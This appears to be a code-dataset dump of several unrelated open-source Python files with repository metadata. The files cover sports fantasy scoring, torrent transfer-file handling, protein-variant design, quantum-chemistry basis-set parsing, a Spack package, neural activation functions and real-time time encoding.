"azjps": {
"Men": ["Jeffrey Babbitt*", "Ryan Osgar", "Connor Matthews", "Dalton Smith", "Conor Kline", "Jack Williams", "Mark Vandenberg"],
"Women": ["Kate Scarth*", "Angela Zhu", "Bethany Kaylor", "Stephanie Williams", "Jesse Shofner", "Courtney Gegg", "Olivia Bartruff"],
}
}
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--num_players", type=int, default=20,
help="Minimum number of top scorers")
parser.add_argument("--markdown", action="store_true",
help="Output as markdown")
parser.add_argument("--csv", action="store_true",
help="Load data from offline csvs")
args = parser.parse_args()
with pd.option_context("display.width", 1000,
"display.max_rows", 100,
"display.max_columns", 100,
"display.max_colwidth", 100):
compute_fantasy_contest_results(min_players=args.num_players,
use_markdown=args.markdown,
from_csv=args.csv)
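# --- Illustrative sketch (not part of the original module) ---
# A hand-made example of the default fantasy-score weighting used in
# compute_athlete_fantasy_scores (goals/assists weight 1, Ds/turns weight 0.2).
# The player stats below are invented purely for demonstration.
def _fantasy_score_example():
    example = pd.DataFrame({"Goals": [5, 2], "Assists": [3, 7],
                            "Ds": [4, 1], "Turns": [2, 6]})
    example["Fantasy Score"] = (example.Goals * 1 + example.Assists * 1 +
                                example.Ds * 0.2 + example.Turns * -0.2)
    # Row 0: 5 + 3 + 0.8 - 0.4 = 8.4; row 1: 2 + 7 + 0.2 - 1.2 = 8.0
    return example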
|
azjps/usau-py
|
usau/fantasy.py
|
Python
|
mit
| 11,294
|
[
"Dalton"
] |
e496e894d078bb7f014a05bfa625d62f3bcb23daa6f693fb7bb06496fbce66bf
|
################################################################################
# $Id$
# $Date$
# $Revision$
################################################################################
# #
# LICENSE #
# #
# This program is free software; you can redistribute it and/or #
# modify it under the terms of the GNU General Public License (GPL) #
# as published by the Free Software Foundation; either version 2 #
# of the License, or (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# To read the license please visit http://www.gnu.org/copyleft/gpl.html #
# #
# #
################################################################################
# standard-imports
import os
# fluazu
from fluazu.output import printError
################################################################################
""" ------------------------------------------------------------------------ """
""" TransferFile """
""" ------------------------------------------------------------------------ """
class TransferFile(object):
""" -------------------------------------------------------------------- """
""" __init__ """
""" -------------------------------------------------------------------- """
def __init__(self, file):
# file
self.file = file
# fields
self.transferowner = ""
self.savepath = ""
self.max_upload_rate = ""
self.max_download_rate = ""
self.max_uploads = ""
self.superseeder = ""
self.die_when_done = ""
self.sharekill = ""
self.minport = ""
self.maxport = ""
self.maxcons = ""
self.rerequest = ""
# init
if self.file != '':
self.initialize(self.file)
""" -------------------------------------------------------------------- """
""" initialize """
""" -------------------------------------------------------------------- """
def initialize(self, file):
# file
self.file = file
# read in transfer-file + set fields
if os.path.isfile(self.file):
try:
# read file to mem
f = open(self.file, 'r')
data = f.read()
f.close()
# set fields
content = data.split("\n")
if len(content) > 11:
self.transferowner = content[0]
self.savepath = content[1]
self.max_upload_rate = content[2]
self.max_download_rate = content[3]
self.max_uploads = content[4]
self.superseeder = content[5]
self.die_when_done = content[6]
self.sharekill = content[7]
self.minport = content[8]
self.maxport = content[9]
self.maxcons = content[10]
self.rerequest = content[11]
return True
else:
printError("Failed to parse transfer-file %s " % self.file)
except:
printError("Failed to read transfer-file %s " % self.file)
return False
""" -------------------------------------------------------------------- """
""" write """
""" -------------------------------------------------------------------- """
def write(self):
# write transfer-file
try:
f = open(self.file, 'w')
f.write(str(self.transferowner) + '\n')
f.write(str(self.savepath) + '\n')
f.write(str(self.max_upload_rate) + '\n')
f.write(str(self.max_download_rate) + '\n')
f.write(str(self.max_uploads) + '\n')
f.write(str(self.superseeder) + '\n')
f.write(str(self.die_when_done) + '\n')
f.write(str(self.sharekill) + '\n')
f.write(str(self.minport) + '\n')
f.write(str(self.maxport) + '\n')
f.write(str(self.maxcons) + '\n')
f.write(str(self.rerequest))
f.flush()
f.close()
return True
except:
printError("Failed to write transfer-file %s " % self.file)
return False
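# --- Illustrative sketch (not part of the original module) ---
# A minimal round-trip through the 12-line transfer-file format handled by the
# class above. The path and field values are assumptions chosen purely for
# demonstration; nothing here runs on import.
def _transfer_file_example(path='/tmp/example.transfer'):
    tf = TransferFile('')            # empty file name skips initialize()
    tf.file = path
    tf.transferowner = 'admin'
    tf.savepath = '/data/downloads'
    tf.max_upload_rate = '100'
    tf.max_download_rate = '500'
    tf.max_uploads = '5'
    tf.superseeder = '0'
    tf.die_when_done = '1'
    tf.sharekill = '150'
    tf.minport = '49160'
    tf.maxport = '49300'
    tf.maxcons = '100'
    tf.rerequest = '1800'
    if tf.write():                   # writes the 12 newline-separated fields
        reread = TransferFile(path)  # re-reads and re-parses the same file
        return reread.savepath == tf.savepath
    return False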
|
epsylon3/torrentflux
|
html/bin/clients/fluazu/fluazu/TransferFile.py
|
Python
|
gpl-2.0
| 5,394
|
[
"VisIt"
] |
b5aa9a48f4d7c4a9548675504be5c68a5e307c15b7005b1ccdc78b65bd0f80a3
|
'''
PathwayGenie (c) GeneGenie Bioinformatics Ltd. 2018
PathwayGenie is licensed under the MIT License.
To view a copy of this license, visit <http://opensource.org/licenses/MIT/>.
@author: neilswainston
'''
# pylint: disable=too-few-public-methods
import sys
from Bio.Alphabet import generic_dna
from Bio.Seq import Seq
from synbiochem.utils import dna_utils, seq_utils
from synbiochem.utils.ice_utils import ICEClientFactory
class ProssOptimiser():
'''Class to optimise designs based on PROSS output.'''
def __init__(self, ice_parms, taxonomy_id,
group_names=None):
self.__ice_client_factory = ICEClientFactory()
self.__ice_client = \
self.__ice_client_factory.get_ice_client(ice_parms[0],
ice_parms[1],
ice_parms[2],
group_names=group_names)
self.__cod_opt = seq_utils.CodonOptimiser(taxonomy_id)
def close(self):
'''Close.'''
self.__ice_client_factory.close()
def generate_variants(self, template_ice_id, variants_aas):
'''Generate variants.'''
for variants_aa_name, variant_aa_seq in variants_aas.items():
# Generate new variant ICEEntry:
ice_entry = self.__ice_client.get_ice_entry(template_ice_id)
_, cds_feat, cds_aa_seq = _get_cds_feat(ice_entry)
var_ice_entry = ice_entry.copy()
var_ice_entry.get_metadata()['name'] = variants_aa_name
# Add stop-codon if missing:
if cds_aa_seq[-1] == '*' and variant_aa_seq[-1] != '*':
variant_aa_seq = variant_aa_seq + '*'
var_seq = self.__mutate(ice_entry.get_seq(),
cds_feat['start'],
cds_aa_seq,
variant_aa_seq)
var_ice_entry.get_dna().set_seq(var_seq)
self.__ice_client.set_ice_entry(var_ice_entry)
assert _translate(var_ice_entry) == variant_aa_seq
def __mutate(self, template_nucl_seq, cds_start, cds_aa_seq,
variant_aa_seq):
'''Perform mutation.'''
var_seq = template_nucl_seq
for pos, pair in enumerate(zip(cds_aa_seq, variant_aa_seq)):
if pair[0] != pair[1]:
codon_start = (cds_start - 1) + pos * 3
var_seq = \
var_seq[:codon_start] + \
self.__cod_opt.get_best_codon(pair[1]) + \
var_seq[codon_start + 3:]
return var_seq
def _get_cds_feat(ice_entry):
'''Get CDS feature from entry.'''
# Get index and CDS feature:
resp = [[idx, feat]
for idx, feat in enumerate(ice_entry.get_dna()['features'])
if feat['typ'] == dna_utils.SO_CDS]
assert len(resp) == 1
nucl_seq = ice_entry.get_seq()
cds_nucl_seq = nucl_seq[resp[0][1]['start'] - 1:resp[0][1]['end']]
cds_aa_seq = str(Seq(cds_nucl_seq, generic_dna).translate())
return resp[0][0], resp[0][1], cds_aa_seq
def _translate(var_ice_entry):
'''Return translation.'''
return str(Seq(var_ice_entry.get_dna()['seq']).translate())[5:]
def main(args):
'''main method.'''
optimiser = ProssOptimiser([args[0], args[1], args[2]], args[4], args[6:])
optimiser.generate_variants(args[3], seq_utils.read_fasta(args[5]))
optimiser.close()
if __name__ == '__main__':
main(sys.argv[1:])
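# --- Illustrative sketch (not part of the original module) ---
# A standalone illustration of the codon-replacement arithmetic used in
# ProssOptimiser.__mutate: amino-acid position pos maps to the nucleotide
# slice starting at (cds_start - 1) + 3 * pos. The template sequence and the
# one-entry codon table below are invented for demonstration only.
def _mutate_example():
    template = 'ATGGCTGCTTAA'    # Met-Ala-Ala-Stop, CDS starting at position 1
    cds_start = 1
    cds_aa_seq = 'MAA*'
    variant_aa_seq = 'MAV*'      # mutate the second Ala to Val
    best_codon = {'V': 'GTT'}    # stand-in for CodonOptimiser.get_best_codon
    seq = template
    for pos, (old, new) in enumerate(zip(cds_aa_seq, variant_aa_seq)):
        if old != new:
            codon_start = (cds_start - 1) + pos * 3
            seq = seq[:codon_start] + best_codon[new] + seq[codon_start + 3:]
    return seq                   # 'ATGGCTGTTTAA'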
|
neilswainston/PathwayGenie
|
scripts/pross.py
|
Python
|
mit
| 3,559
|
[
"VisIt"
] |
f4b91a264e6367bc7d7cc782e944ef57e79db749be7649adebb4bb8d52274362
|
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2017 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import os
import re
import sys
from .exceptions import *
from .libmintsgshell import *
if sys.version_info >= (3,0):
basestring = str
class Gaussian94BasisSetParser(object):
"""Class for parsing basis sets from a text file in Gaussian 94
format. Translated directly from the Psi4 libmints class written
by Justin M. Turney and Andrew C. Simmonett.
"""
def __init__(self, forced_puream=None):
"""Constructor"""
# If the parser needs to force spherical or cartesian (e.g., loading old guess)
self.force_puream_or_cartesian = False if forced_puream is None else True
# Is the forced value to use puream? (Otherwise force Cartesian).
self.forced_is_puream = False if forced_puream is None else forced_puream
# string filename
self.filename = None
def load_file(self, filename, basisname=None):
"""Load and return the file to be used by parse. Return only
portion of *filename* pertaining to *basisname* if specified (for
multi-basisset files) otherwise entire file as list of strings.
"""
# string filename
self.filename = filename
given_basisname = False if basisname is None else True
found_basisname = False
basis_separator = re.compile(r'^\s*\[\s*(.*?)\s*\]\s*$')
# Loads an entire file.
try:
infile = open(filename, 'r')
except IOError:
raise BasisSetFileNotFound("""BasisSetParser::parse: Unable to open basis set file: %s""" % (filename))
if os.stat(filename).st_size == 0:
raise ValidationError("""BasisSetParser::parse: given filename '%s' is blank.""" % (filename))
contents = infile.readlines()
lines = []
for text in contents:
text = text.strip()
# If no basisname was given always save the line.
if given_basisname is False:
lines.append(text)
if found_basisname:
# If we find another [*] we're done.
if basis_separator.match(text):
what = basis_separator.match(text).group(1)
break
lines.append(text)
continue
# If the user gave a basisname AND text matches the basisname we want to trigger to retain
if given_basisname and basis_separator.match(text):
if basisname == basis_separator.match(text).group(1):
found_basisname = True
return lines
def parse(self, symbol, dataset):
"""Given a string, parse for the basis set needed for atom.
* @param symbol atom symbol to look for in dataset
* @param dataset data set to look through
dataset can be list of lines or a single string which will be converted to list of lines
"""
if isinstance(dataset, basestring):
lines = dataset.split('\n')
else:
lines = dataset
# Regular expressions that we'll be checking for.
cartesian = re.compile(r'^\s*cartesian\s*', re.IGNORECASE)
spherical = re.compile(r'^\s*spherical\s*', re.IGNORECASE)
comment = re.compile(r'^\s*\!.*') # line starts with !
separator = re.compile(r'^\s*\*\*\*\*') # line starts with ****
ATOM = '(([A-Z]{1,3}\d*)|([A-Z]{1,3}_\w+))' # match 'C 0', 'Al c 0', 'P p88 p_pass 0' not 'Ofail 0', 'h99_text 0'
atom_array = re.compile(r'^\s*((' + ATOM + '\s+)+)0\s*$', re.IGNORECASE) # array of atomic symbols terminated by 0
atom_ecp = re.compile(r'^\s*((' + ATOM + '-ECP\s+)+)(\d+)\s+(\d+)\s*$', re.IGNORECASE) # atom_ECP number number
shell = re.compile(r'^\s*(\w+)\s*(\d+)\s*(-?\d+\.\d+)') # Match beginning of contraction
blank = re.compile(r'^\s*$')
NUMBER = r'((?:[-+]?\d*\.\d+(?:[DdEe][-+]?\d+)?)|(?:[-+]?\d+\.\d*(?:[DdEe][-+]?\d+)?)|(?:[-+]?\d+))'
primitives1 = re.compile(r'^\s*' + NUMBER + '\s+' + NUMBER + '.*') # Match s, p, d, f, g, ... functions
primitives2 = re.compile(r'^\s*' + NUMBER + '\s+' + NUMBER + '\s+' + NUMBER + '.*') # match sp functions
ecpinfo = re.compile(r'^\s*(\d)\s+' + NUMBER + '\s+' + NUMBER + '.*') # Match rpower, exponent, coefficient
# s, p and s, p, d can be grouped together in Pople-style basis sets
sp = 'SP'
spd = 'SPD'
# a b c d e f g h i j k l m n o p q r s t u v w x y z
#shell_to_am = [-1,-1,-1, 2,-1, 3, 4, 5, 6,-1, 7, 8, 9,10,11, 1,12,13, 0,14,15,16,17,18,19,20]
alpha = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L',
'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
angmo = [-1, -1, -1, 2, -1, 3, 4, 5, 6, -1, 7, 8,
9, 10, 11, 1, 12, 13, 0, 14, 15, 16, 17, 18, 19, 20]
shell_to_am = dict(zip(alpha, angmo))
# Basis type.
gaussian_type = 'Pure'
if self.force_puream_or_cartesian:
if self.forced_is_puream == False:
gaussian_type = 'Cartesian'
# Need a dummy center for the shell.
center = [0.0, 0.0, 0.0]
shell_list = []
ecp_shell_list = []
lineno = 0
ncore = 0
ecp_msg = None
basis_found = False
while lineno < len(lines):
line = lines[lineno]
lineno += 1
# Ignore blank lines
if blank.match(line):
continue
# Look for Cartesian or Spherical
if not self.force_puream_or_cartesian:
if cartesian.match(line):
gaussian_type = 'Cartesian'
#TODO if psi4.get_global_option('PUREAM').has_changed():
#TODO gaussian_type = 'Pure' if int(psi4.get_global('PUREAM')) else 'Cartesian'
continue
elif spherical.match(line):
gaussian_type = 'Pure'
#TODO if psi4.get_global_option('PUREAM').has_changed():
#TODO gaussian_type = 'Pure' if int(psi4.get_global('PUREAM')) else 'Cartesian'
continue
#end case where puream setting wasn't forced by caller
# Do some matches
if comment.match(line):
continue
if separator.match(line):
continue
# Match: H 0
# or: H O... 0
if atom_array.match(line):
what = atom_array.match(line).group(1).split()
if symbol in [x.upper() for x in what]:
# Read in the next line
line = lines[lineno]
lineno += 1
# Match: H_ECP 0
# or: H_ECP O_ECP ... 0
if atom_ecp.match(line):
ecp_msg = """line %5d""" % (lineno)
symbol_to_am = {0: 0, 's': 0, 'S': 0,
1: 1, 'p': 1, 'P': 1,
2: 2, 'd': 2, 'D': 2,
3: 3, 'f': 3, 'F': 3,
4: 4, 'g': 4, 'G': 4}
# This is an ECP spec like "KR-ECP 3 28"
matchobj = atom_ecp.match(line)
sl = line.split()
maxam = int(sl[-2])
ncore = int(sl[-1])
# This parser is not tolerant of comments or blank lines. Perhaps the best strategy is to
# remove all comments/blank lines first before getting in here. This'll do for now.
for am in range(maxam+1):
# The next line is the angular-momentum label, e.g. "f-ul potential"
line = lines[lineno]
lineno += 1
angmom = symbol_to_am[line.lstrip()[0]]
if am == 0: angmom = -angmom # Flag this as a Type1 shell, by setting negative AM. This'll be handled in the BasisSet builder.
line = lines[lineno]
lineno += 1
nprimitives = int(line)
rpowers = [0 for i in range(nprimitives)]
exponents = [0.0 for i in range(nprimitives)]
contractions = [0.0 for i in range(nprimitives)]
for term in range(nprimitives):
line = lines[lineno]
lineno += 1
line = line.replace('D', 'e', 2)
line = line.replace('d', 'e', 2)
what = ecpinfo.match(line)
if not what:
raise ValidationError("""Gaussian94BasisSetParser::parse: Bad ECP specification : line %d: %s""" % (lineno, line))
rpowers[term] = int(what.group(1))
exponents[term] = float(what.group(2))
contractions[term] = float(what.group(3))
# We have a full shell, push it to the basis set
ecp_shell_list.append(ShellInfo(angmom, contractions, exponents,
gaussian_type, 0, center, 0, 'Normalized', rpowers))
else:
# This is a basis set spec
basis_found = True
msg = """line %5d""" % (lineno)
# Need to do the following until we match a "****" which is the end of the basis set
while not separator.match(line):
# Match shell information
if shell.match(line):
what = shell.match(line)
shell_type = str(what.group(1)).upper()
nprimitive = int(what.group(2))
scale = float(what.group(3))
if len(shell_type) == 1:
am = shell_to_am[shell_type[0]]
exponents = [0.0] * nprimitive
contractions = [0.0] * nprimitive
for p in range(nprimitive):
line = lines[lineno]
lineno += 1
line = line.replace('D', 'e', 2)
line = line.replace('d', 'e', 2)
what = primitives1.match(line)
# Must match primitives1; will work on the others later
if not what:
raise ValidationError("""Gaussian94BasisSetParser::parse: Unable to match an exponent with one contraction: line %d: %s""" % (lineno, line))
exponent = float(what.group(1))
contraction = float(what.group(2))
# Scale the contraction and save the information
contraction *= scale
exponents[p] = exponent
contractions[p] = contraction
# We have a full shell, push it to the basis set
shell_list.append(ShellInfo(am, contractions, exponents,
gaussian_type, 0, center, 0, 'Unnormalized'))
elif len(shell_type) == 2:
# This is to handle instances of SP, PD, DF, FG, ...
am1 = shell_to_am[shell_type[0]]
am2 = shell_to_am[shell_type[1]]
exponents = [0.0] * nprimitive
contractions1 = [0.0] * nprimitive
contractions2 = [0.0] * nprimitive
for p in range(nprimitive):
line = lines[lineno]
lineno += 1
line = line.replace('D', 'e', 2)
line = line.replace('d', 'e', 2)
what = primitives2.match(line)
# Must match primitives2
if not what:
raise ValidationError("Gaussian94BasisSetParser::parse: Unable to match an exponent with two contractions: line %d: %s" % (lineno, line))
exponent = float(what.group(1))
contraction = float(what.group(2))
# Scale the contraction and save the information
contraction *= scale
exponents[p] = exponent
contractions1[p] = contraction
# Do the other contraction
contraction = float(what.group(3))
# Scale the contraction and save the information
contraction *= scale
contractions2[p] = contraction
shell_list.append(ShellInfo(am1, contractions1, exponents,
gaussian_type, 0, center, 0, 'Unnormalized'))
shell_list.append(ShellInfo(am2, contractions2, exponents,
gaussian_type, 0, center, 0, 'Unnormalized'))
else:
raise ValidationError("""Gaussian94BasisSetParser::parse: Unable to parse basis sets with spd, or higher grouping""")
else:
raise ValidationError("""Gaussian94BasisSetParser::parse: Expected shell information, but got: line %d: %s""" % (lineno, line))
line = lines[lineno]
lineno += 1
if not basis_found:
#raise BasisSetNotFound("Gaussian94BasisSetParser::parser: Unable to find the basis set for %s in %s" % \
# (symbol, self.filename), silent=True)
return None, None, None, None, None
return shell_list, msg, ecp_shell_list, ecp_msg, ncore
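# --- Illustrative sketch (not part of the original module) ---
# A small standalone check of the primitive-line matching done in parse():
# Fortran-style 'D' exponents are rewritten to 'e' before the NUMBER-based
# regex is applied. The sample basis-set line below is an assumption used
# purely for demonstration.
def _primitive_line_example():
    NUMBER = r'((?:[-+]?\d*\.\d+(?:[DdEe][-+]?\d+)?)|(?:[-+]?\d+\.\d*(?:[DdEe][-+]?\d+)?)|(?:[-+]?\d+))'
    primitives1 = re.compile(r'^\s*' + NUMBER + r'\s+' + NUMBER + r'.*')
    line = '      0.1873113696D+02       0.3349460434D-01'
    line = line.replace('D', 'e', 2)
    what = primitives1.match(line)
    # exponent ~= 18.73113696, contraction ~= 0.03349460434
    return float(what.group(1)), float(what.group(2))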
|
jH0ward/psi4
|
psi4/driver/qcdb/libmintsbasissetparser.py
|
Python
|
lgpl-3.0
| 16,141
|
[
"Gaussian",
"Psi4"
] |
764cca97cba4b2b7725ad088c26931ad5c546a8485996eac8b71bc4ce87ecfb3
|
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RYarn(RPackage):
"""Expedite large RNA-Seq analyses using a combination of previously
developed tools. YARN is meant to make it easier for the user to
perform basic mis-annotation quality control, filtering, and
condition-aware normalization. YARN leverages many Bioconductor tools
and statistical techniques to account for the large heterogeneity and
sparsity found in very large RNA-seq experiments."""
homepage = "https://bioconductor.org/packages/yarn/"
url = "https://git.bioconductor.org/packages/yarn"
list_url = homepage
version('1.2.0', git='https://git.bioconductor.org/packages/yarn', commit='28af616ef8c27dcadf6568e276dea8465486a697')
depends_on('r-biobase', type=('build', 'run'))
depends_on('r-biomart', type=('build', 'run'))
depends_on('r-downloader', type=('build', 'run'))
depends_on('r-edger', type=('build', 'run'))
depends_on('r-gplots', type=('build', 'run'))
depends_on('r-limma', type=('build', 'run'))
depends_on('r-matrixstats', type=('build', 'run'))
depends_on('r-preprocesscore', type=('build', 'run'))
depends_on('r-readr', type=('build', 'run'))
depends_on('r-rcolorbrewer', type=('build', 'run'))
depends_on('r-quantro', type=('build', 'run'))
depends_on('r@3.4.0:3.4.9', when='@1.2.0')
|
EmreAtes/spack
|
var/spack/repos/builtin/packages/r-yarn/package.py
|
Python
|
lgpl-2.1
| 2,596
|
[
"Bioconductor"
] |
e8ffc74e1b7ddbe4d17a227513246d618512f005862fa6a2c48890a798a22104
|
'''
Created on Oct 9, 2014
@author: dusenberrymw
'''
import math
class Logistic(object):
"""The Logistic (Sigmoid) activation function, which is one of the
possibilities that can be used by the network
"""
def __init__(self):
self.name = "logistic"
def activate(self, input_value):
"""Run the input value through the sigmoid function
This will only return values between 0 and 1
"""
try:
return 1 / (1 + math.exp(-1*input_value))
except OverflowError:
# bound the numbers if there is an overflow
print("overflow")
if input_value < 0:
return 0.0000000000001  # logistic func goes to 0 for large negative x
else:
return 0.9999999999999
def derivative(self, fx):
"""Calculate derivative of logistic function, given an output F(x)
Given F is the logistic (sigmoid) function, the derivative
F'(x) = F(x) * (1 - F(x))
F(x) will be passed in for efficiency
"""
return fx*(1-fx)
def inverse(self, input_value):
"""This will produce the inverse of the sigmoid function, which is
useful in determining the original value before activation
"""
return math.log(input_value/(1-input_value))
def cost(self, hypothesis_output, target_output):
"""Cost function of a node using the logistic activation function
cost(h_theta(x), y) = -log(h_theta(x)) if y = 1
-log(1-h_theta(x)) if y = 0
where h_theta(x) is the hypothesis (computed output) of the
node evaluated with respect to theta (parameter/weight vector)
evaluated at input x,
and cost is the "error" of the node with respect to
hypothesis of x parameterized by theta (weights & threshold
vectors) given the target value y
This cost function essentially allows for no error if the hypothesis
is equal to the target y, and high error otherwise
Note: 'log' is the natural log
"""
y = target_output
hx = hypothesis_output
c = -y*math.log(hx) - (1-y)*math.log(1-hx)
return c
def cost_derivative(self, hypothesis_output, target_output):
"""Partial derivative of the cost function wrt the hypothesis of a
neuron using the logistic activation function
This will basically determine how much the hypothesis (output of the
neuron) contributed to the cost ("error") of the neuron
"""
y = target_output
hx = hypothesis_output
dc = (y-1)/(hx-1) - y/hx
return dc
class Tanh(object):
"""The Tanh (Logistic spinoff) activation function, which is one of the
possibilities that can be used by the network
"""
def __init__(self):
self.name = "tanh"
def activate(self, input_value):
"""Run the input value through the tanh function"""
#return math.tanh(input_value)
return ((math.exp(input_value)-math.exp(-input_value)) /
(math.exp(input_value)+math.exp(-input_value)))
def derivative(self, fx):
"""Some training will require the derivative of the tanh function"""
return (1.0-fx) * (1.0+fx)
def inverse(self, input_value):
"""This will produce the inverse of the tanh function, which is
useful in determining the original value before activation
"""
return math.atanh(input_value)
def cost(self, hypothesis_output, target_output):
"""Cost function of a node using the tanh activation function
cost(h_theta(x), y) = (1/2)*(|h_theta(x)-y|^2)
"""
y = target_output
hx = hypothesis_output
c = (1/2)*((hx-y)**2)
return c
def cost_derivative(self, hypothesis_output, target_output):
"""Partial derivative of the cost function wrt the hypothesis of a
neuron using the tanh activation function
This will basically determine how much the hypothesis (output of the
neuron) contributed to the cost ("error") of the neuron
"""
y = target_output
hx = hypothesis_output
dc = hx - y
return dc
class Linear(object):
"""The Linear activation function, which is one of the
possibilities that can be used by the network
"""
def __init__(self):
self.name = "linear"
def activate(self, input_value):
"""In the linear function, f(z) = z"""
return input_value
def derivative(self, fx):
"""Some training will require the derivative of the linear function
which is just 1
"""
return 1
def inverse(self, input_value):
"""This will produce the inverse of the linear function, which is
useful in determining the original value before activation
"""
return input_value
def cost(self, hypothesis_output, target_output):
"""Cost function of a node using the Linear activation function
cost(h_theta(x), y) = (1/2)*((h_theta(x)-y)^2)
"""
y = target_output
hx = hypothesis_output
c = (1/2)*((hx-y)**2)
return c
def cost_derivative(self, hypothesis_output, target_output):
"""Partial derivative of the cost function wrt the hypothesis of a
neuron using the linear activation function
This will basically determine how much the hypothesis (output of the
neuron) contributed to the cost ("error") of the neuron
"""
y = target_output
hx = hypothesis_output
dc = hx - y
return dc
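# --- Illustrative sketch (not part of the original module) ---
# A tiny numerical check of the Logistic class defined above: activate() and
# inverse() should round-trip, and derivative(F(x)) should agree with a
# central finite-difference estimate. The input value 0.5 is arbitrary.
def _logistic_example(x=0.5):
    logistic = Logistic()
    fx = logistic.activate(x)                  # sigmoid(0.5) ~= 0.6225
    assert abs(logistic.inverse(fx) - x) < 1e-9
    eps = 1e-6
    numeric = (logistic.activate(x + eps) - logistic.activate(x - eps)) / (2 * eps)
    assert abs(logistic.derivative(fx) - numeric) < 1e-6
    return fx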
|
dusenberrymw/Pine
|
pine/activation.py
|
Python
|
mit
| 5,768
|
[
"NEURON"
] |
fe2a0ab2a3ac3bd48d0196f05490a5f4e46ea3c441fb4209d5bbe276c0491e6d
|
#!/usr/bin/env python
"""
Real-time time encoding and decoding algorithms. These algorithms
can process signals of arbitrary length without the memory
limitations of the functions in the asdm and iaf modules.
- ASDMRealTimeDecoder - Real-time ASDM decoder.
- ASDMRealTimeDecoderIns - Parameter-insensitive real-time ASDM decoder.
- ASDMRealTimeEncoder - Real-time ASDM encoder.
- IAFRealTimeEncoder - Real-time IAF encoder.
- IAFRealTimeDecoder - Real-time IAF decoder.
- iaf_decode - Functional wrapper for IAFRealTimeDecoder
- iaf_encode - Functional wrapper for IAFRealTimeEncoder
- iaf_decode_delay - Real-time delayed IAF decoder.
- iaf_encode_delay - Real-time delayed IAF encoder.
"""
# Copyright (c) 2009-2015, Lev Givon
# All rights reserved.
# Distributed under the terms of the BSD license:
# http://www.opensource.org/licenses/bsd-license
__all__ = ['SignalProcessor',
'RealTimeEncoder', 'RealTimeDecoder',
'ASDMRealTimeEncoder', 'ASDMRealTimeDecoder',
'ASDMRealTimeDecoderIns',
'IAFRealTimeEncoder', 'IAFRealTimeDecoder',
'iaf_decode', 'iaf_encode',
'iaf_decode_delay', 'iaf_encode_delay']
# Setting this flag enables the silent generation of a debug plot
# depicting the progress of the stitching algorithm employed in the
# real-time decoders.
debug = False
if debug:
try:
from matplotlib.figure import Figure
from matplotlib.backends.backend_agg import FigureCanvasAgg
except ImportError:
debug = False
else:
debug_plot_filename = 'rt_debug.png'
debug_plot_figsize = (7, 5)
debug_plot_dpi = 100
import numpy as np
import bionet.utils.misc as m
import bionet.utils.numpy_extras as ne
import bionet.ted.asdm as asdm
import bionet.ted.iaf as iaf
import bionet.ted.vtdm as vtdm
class SignalProcessor(object):
"""
Abstract signal processor.
This class describes a signal processor that retrieves blocks
of signal data from a source, applies some processing algorithm to
it, and saves the processed blocks.
Methods
-------
process(get, put)
Process data obtained from `get()` and write it using `put()`.
Notes
-----
The `process()` method must be extended in subclasses of this class in
order to make them functional.
"""
def __init__(self, *args):
"""Initialize a signal processor with the specified
parameters."""
self.params = args
def __call__(self, x):
"""Calling a class instance is equivalent to running the
processor on the specified sequence `x`."""
result = []
iterator = m.chunks(x, len(x)/10)
def get():
try:
return iterator.next()
except StopIteration:
return []
def put(y):
result.extend(y)
self.process(get, put)
return result
def process(self, get, put):
"""Process data obtained in blocks from the function `get()`
and write them out using the function `put()`."""
if not callable(get):
raise ValueError('get() must be callable')
if not callable(put):
raise ValueError('put() must be callable')
def __repr__(self):
"""Represent a signal processor in terms its parameters."""
return self.__class__.__name__+repr(tuple(self.params))
class RealTimeEncoder(SignalProcessor):
"""
Abstract real-time time encoding machine.
This class implements a real-time time encoding machine. It
must be subclassed to use a specific encoding algorithm.
Methods
-------
encode(data, ...)
Encode a block of data using the additional parameters.
process(get, put)
Process data obtained from `get()` and write it using `put()`.
Notes
-----
The `encode()` method must be extended to contain a time encoding
algorithm implementation in functional subclasses of this class.
"""
def __init__(self, *args):
"""Initialize a real-time time encoder."""
SignalProcessor.__init__(self, *args)
def encode(self, *args):
"""Encode a block of data. This method must be reimplemented
to use a specific encoding algorithm implementation."""
pass
def process(self, get, put):
"""Encode data returned in blocks by function `get()` and
write it to some destination using the function `put()`."""
SignalProcessor.process(self, get, put)
# The invocation of self.encode() assumes that the method
# returns a tuple containing processed data in its first entry
# followed by all of the parameters be passed back to the
# method in subsequent invocations:
while True:
input_data = get()
if len(input_data) == 0:
break
temp = self.encode(input_data)
